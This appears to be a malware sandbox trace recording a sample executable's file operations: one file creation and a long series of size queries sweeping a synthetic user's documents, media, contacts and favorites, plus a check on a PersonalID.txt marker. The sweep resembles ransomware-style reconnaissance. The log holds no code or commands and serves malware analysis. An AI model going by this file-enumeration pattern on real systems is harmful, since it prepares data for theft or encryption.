Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\_eu6q3E zyK.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\SystemID\PersonalID.txt type = file_type True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact type = size, size_out = 1178 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact type = size, size_out = 68382 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact type = size, size_out = 1171 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact type = size, size_out = 1177 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact type = size, size_out = 1174 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact type = size, size_out = 1172 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cPHmz4y9hlXd6trOnGz.ots type = size, size_out = 79067 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\dSfwXCkwSPKl-.avi type = size, size_out = 64976 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EDVS.avi type = size, size_out = 14789 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\frVUZwt9PcEpwFw.jpg type = size, size_out = 81045 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\G0k7.m4a type = size, size_out = 63935 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\GH F.mp3 type = size, size_out = 28394 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Gp40F.mp3 type = size, size_out = 52246 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\h7iN.jpg type = size, size_out = 29997 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\IcgE7 x.mp3 type = size, size_out = 44108 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\K0eRKbFqwJi63h.flv type = size, size_out = 83739 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KaYNqgG.bmp type = size, size_out = 20816 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe type = size, size_out = 396800 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ntzf.doc type = size, size_out = 71052 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Pjxm0.mp3 type = size, size_out = 93899 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\sDwPUwZG7wDgXptt.flv type = size, size_out = 22917 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uJu-CI.mp3 type = size, size_out = 12143 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uZ7jTVGLo.pdf type = size, size_out = 71318 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\vDgHCp4Eu83i9SpY9-10.m4a type = size, size_out = 69041 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wmwdI-cLzMW1U.rtf type = size, size_out = 40048 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\xZVVdLTP5CRjDGwK.mp3 type = size, size_out = 101332 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\_pjDf89YoIOK7INngcQL.swf type = size, size_out = 26798 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\13WDFkzLx13VDvEaH0D.pptx type = size, size_out = 95431 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4Q Yden1pX.xls type = size, size_out = 90350 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4zo3jZ4ZhCJWz.doc type = size, size_out = 91509 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7SVXau9BM-qAm.docx type = size, size_out = 88704 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\8OcrQfqf9.xlsx type = size, size_out = 40458 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\aHQ0mStm7MOUQz8p.csv type = size, size_out = 53588 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c74ORtbzoKEgt1tULZrF.ots type = size, size_out = 91613 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Eiz2OkszASes0dl.ods type = size, size_out = 58219 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\G5QwtEl2iSslGa.ots type = size, size_out = 22311 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ixHgNpSkmetkMwk0N.doc type = size, size_out = 47237 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\jLUC 3.docx type = size, size_out = 95757 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mMGsDdpRxCcIwjb.pptx type = size, size_out = 62114 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mXYQzNZWY3_pbSh7dVoS.xlsx type = size, size_out = 14136 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rOeN9J2zJO_02nt1ly.docx type = size, size_out = 54781 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rrn5_p.docx type = size, size_out = 15007 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Sh2l9d6EAI4aRt7OOr6g.pptx type = size, size_out = 31657 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tJLm4JiczASJ_8Z0U3i.ots type = size, size_out = 97311 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\uJO-YiH9NhpREYVYgJi.xlsx type = size, size_out = 30312 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\VJH-kfHp7SFpre94.pptx type = size, size_out = 25136 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\wZOz3j2ll6HfOuxlg93b.docx type = size, size_out = 24873 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\x7bIgakKt.docx type = size, size_out = 27398 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\XhDBm5L_.xlsx type = size, size_out = 85618 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yB0OOX Rk5q.pptx type = size, size_out = 41682 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\_7Xr5yfzUYNnPcQwSd50.xlsx type = size, size_out = 20319 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\-GcGxMxOZK4.m4a type = size, size_out = 90689 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\07G0ZL7bvnBKvt7n.mp3 type = size, size_out = 14444 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\1tk99aXbfw9RlvqZV.mp3 type = size, size_out = 13514 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\8HrfWqZar65w.wav type = size, size_out = 9056 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\bS4AaW9eUKRKSJX2c.m4a type = size, size_out = 82045 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\eySD-sWxKcR.m4a type = size, size_out = 63652 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\FB pP.m4a type = size, size_out = 35188 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\FC0AY.wav type = size, size_out = 49503 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\FiSO1uvHs5.wav type = size, size_out = 7710 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\fQh6.wav type = size, size_out = 16405 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\g9mcoi9dYhMEy.m4a type = size, size_out = 73624 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\H94nos6VqWF8Oqje.m4a type = size, size_out = 100399 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\H99vbmXS7JVu8GvPT.mp3 type = size, size_out = 80228 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\hf0MR7KC2v0S0EFbF.mp3 type = size, size_out = 61338 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\j nRVt1oLEKKj.m4a type = size, size_out = 61675 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\jgXL.wav type = size, size_out = 99046 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\MyJjOnayKnFCwyo3.m4a type = size, size_out = 73029 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\nh7G7MoNq.wav type = size, size_out = 32870 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\NTjyCO-pmQ3AS.mp3 type = size, size_out = 36793 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\O841-zc0Cz.m4a type = size, size_out = 1458 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\PBGnAJbjKeNYoVmuXsp.wav type = size, size_out = 42788 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\POR XU-fcmkfoFYhwpS_.mp3 type = size, size_out = 5249 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\ptcryHpXY3gBNb.m4a type = size, size_out = 87332 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\qpbO.wav type = size, size_out = 71965 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\S4IWsPZvnadFRmzK.mp3 type = size, size_out = 83532 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\SIP IIj4TyP2E.mp3 type = size, size_out = 79489 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\SOIg.mp3 type = size, size_out = 73704 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\SpwIY0qQ5DxtnlG-Nb.m4a type = size, size_out = 99070 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\th0xZ3rZW1yj.m4a type = size, size_out = 36985 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\unP_Med.m4a type = size, size_out = 59634 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\wcuQuzjX.wav type = size, size_out = 75982 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\WqT6i1.m4a type = size, size_out = 44975 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\y9xtUA5iI6IPOKUD.wav type = size, size_out = 65205 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\Z3UK3vFO8h-zCs4j.mp3 type = size, size_out = 84246 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\ZBi4Ka.wav type = size, size_out = 47073 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\zyzE7.m4a type = size, size_out = 82974 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Music\_wiR1L3MR2ebfVeG.mp3 type = size, size_out = 55015 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\3vMt_2q3fAah.png type = size, size_out = 88490 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\CrjCu6i aZorUJcYh.png type = size, size_out = 52977 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\IblMdY4N1yG.bmp type = size, size_out = 92277 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\eFGyeqngF0yupS6aQiTk.mkv type = size, size_out = 69373 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\HuEJMg3KiSp.avi type = size, size_out = 39700 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\0JOcjFAlZN.flv type = size, size_out = 85298 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\7H07rLnEi4jFThR2aq.mp4 type = size, size_out = 1461 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\ceQR-g1K.flv type = size, size_out = 90765 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Gtis3rDzqOHJLSemRMN.odp type = size, size_out = 22037 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\hjjmc6wvdBzNble_jQ.m4a type = size, size_out = 63814 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\IqxOJCjnMrxHR71kHDep.mp3 type = size, size_out = 43397 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\KMX9gyhiVByA4.mp4 type = size, size_out = 46818 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\rX Jr.png type = size, size_out = 77261 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\sKevCgi1Mzg9JDdGUMsM.flv type = size, size_out = 57330 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\0d9kggXW.pdf type = size, size_out = 36914 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\aFuREbY291J9.rtf type = size, size_out = 63884 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\bhC_ABvBjR.ods type = size, size_out = 78977 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\hK5LQd-AxtZKvzbn.xlsx type = size, size_out = 29191 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\lbsR.csv type = size, size_out = 32765 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\mdkvH5k.csv type = size, size_out = 82000 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\pelEM3i4e4Jx_4 Wkx.pdf type = size, size_out = 26686 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst type = size, size_out = 271360 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url type = size, size_out = 236 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url type = size, size_out = 226 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url type = size, size_out = 134 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url type = size, size_out = 133 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\z2lk.jpg type = size, size_out = 53609 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\P1zhXc0ibiHP0Bs2v5.gif type = size, size_out = 13697 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\l6LO.bmp type = size, size_out = 41349 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\MFSIcW7l5OKlh5.gif type = size, size_out = 61854 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\WQb DhJ7Wo.jpg type = size, size_out = 94060 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\_1-Z0l.gif type = size, size_out = 22528 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\8Vj kyoaTN1vy L0-Vsr.mp4 type = size, size_out = 2257 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\9zW0DyjAU1Nrc.mkv type = size, size_out = 79987 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\BoizzI4g97t.flv type = size, size_out = 69282 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\fXPAxGgq.avi type = size, size_out = 72319 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\Iq gbMO_n.flv type = size, size_out = 19270 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\UtVdyOv5.swf type = size, size_out = 19504 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\2BSi.ods type = size, size_out = 26047 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\eOYyRR2EObYB.wav type = size, size_out = 4575 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\eZfj5ZvjMOZ.m4a type = size, size_out = 73046 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\O7mIpznG0.gif type = size, size_out = 85148 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\qDPtFMhAiJ2xQ vm.odp type = size, size_out = 92562 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\1TiNgxSzmOsn7Ri OkP.ots type = size, size_out = 43152 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\20r7oIjlUFUIkP.ppt type = size, size_out = 44298 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\ALIdU0.docx type = size, size_out = 34725 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\C0 _B8qINeQrUbrt.csv type = size, size_out = 88867 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\faBTC43kElpNlGMFau.pps type = size, size_out = 92074 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico type = size, size_out = 29926 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\CugNJ6pb94kQCPMiK.jpg type = size, size_out = 13905 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\pySmPr79Heo.png type = size, size_out = 23511 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\Zusq yA8dO-j.gif type = size, size_out = 99588 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\3CYFm.jpg type = size, size_out = 46088 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\KZrZHmvQBeSkBOCD.jpg type = size, size_out = 10622 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\m7Zhy4P-VQ66.gif type = size, size_out = 67246 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\R7Kau5o.gif type = size, size_out = 8742 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\3Bsx2yMEE1UNteJQW\OQg8wwtsOsz4VSDTpD.png type = size, size_out = 75421 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\bbyLspO02\hd0ZLwcXz17isUe1hi_.gif type = size, size_out = 83076 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\bbyLspO02\y lRKLTJHdvF Q.gif type = size, size_out = 91322 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\eyP8XnrLY rQ9ZYZ.gif type = size, size_out = 86592 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\lfJNr8tOZ7oDHun6ukoV.gif type = size, size_out = 44314 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\VFWyDHM.png type = size, size_out = 62342 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\a9qF7OuHrZ4T.flv type = size, size_out = 15861 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\KEz1B VUjzGhZ.swf type = size, size_out = 79249 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\RrLl7FRJlURSY01.flv type = size, size_out = 35824 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\X98zhXIRm mnrxp8RLxH.avi type = size, size_out = 28200 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\1Sx-VZ.ppt type = size, size_out = 101188 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\5ETH-YOt.pps type = size, size_out = 86529 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\5LxZSjV.pdf type = size, size_out = 3251 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\8GBnXsZ.pdf type = size, size_out = 3368 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\aVltm_fp_1spcSpiUB7E.pptx type = size, size_out = 82224 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\c7w3Be_K.pptx type = size, size_out = 80822 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\dthjAR.odt type = size, size_out = 85596 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\HOw3I9OnurIF0.pptx type = size, size_out = 55766 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\ieaOD_.odt type = size, size_out = 1582 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\kLhp.docx type = size, size_out = 80231 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\M85S8 e0deSz1O2lZp.xls type = size, size_out = 98601 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\pbZLWA2gHx6B.ods type = size, size_out = 43538 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\z ACbUu.csv type = size, size_out = 101841 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\NSMy5XFpc9v55E4.png type = size, size_out = 17308 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\sMjYpjKhyZpf8TNaMG.gif type = size, size_out = 61845 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\V6CUx4Z.png type = size, size_out = 48034 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\l65Ij.avi type = size, size_out = 59396 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\lZ73i.avi type = size, size_out = 83409 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\NDd8nvPiASazxx_Qnd.mp4 type = size, size_out = 99089 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\QV66E7hBIev3ByZZaaQi.flv type = size, size_out = 1154 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\T0lSyaUX_nTdUnU89-7l.avi type = size, size_out = 35200 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\M9S6OcF7aYbMU.swf type = size, size_out = 23906 True 1
Fn
